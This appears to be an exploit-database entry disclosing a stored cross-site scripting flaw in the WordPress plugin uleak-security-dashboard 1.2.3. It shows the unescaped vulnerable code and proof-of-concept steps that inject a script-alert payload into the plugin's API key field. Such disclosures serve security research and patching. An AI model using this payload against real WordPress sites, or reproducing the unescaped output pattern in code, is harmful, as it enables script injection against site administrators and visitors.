Exploit for WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting

Name: Exploit for WordPress Uleak Security Dashboard 1.2.3 Cross Site Scripting
Rating: 5 (233 reviews)

2022-04-01 | CVSS 0.0

## https://sploitus.com/exploit?id=PACKETSTORM:166564
# Exploit Title: WordPress Plugin uleak-security-dashboard 1.2.3 - Stored Cross-Site Scripting (Authenticated)  
# Date: 31-03-2022  
# Exploit Author: Hassan Khan Yusufzai - Splint3r7  
# Vendor Homepage: https://wordpress.org/plugins/uleak-security-dashboard/ <https://wordpress.org/plugins/amministrazione-aperta/>  
# Version: 1.2.3  
# Tested on: Firefox  
# Contact me: h [at] spidersilk.com  
  
# Vulnerable Code:  
  
```  
<th scope="row"><label>ULeak API Key*: </label></th>  
<td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX"  
value="'.$user['apikey'].'"><span class="description">(Insert your ULeak  
API Key. Find your Credentials in your profil settings <a target="_blank"  
href="https://uleak.de/profil">here</a>)</span></td>  
```  
  
# POC  
  
1) Install uleak-security-dashboard WordPress Plugin  
2) Naviagete to http://localhost/wp-admin/tools.php?page=uleak  
3) Inject payload ```"><script>alert(1)</script>```  
in *ULeak API Key*: *filed.  
4) XSS will trigger.  
  
# POC Image  
  
https://prnt.sc/D7sq6IlNtNaf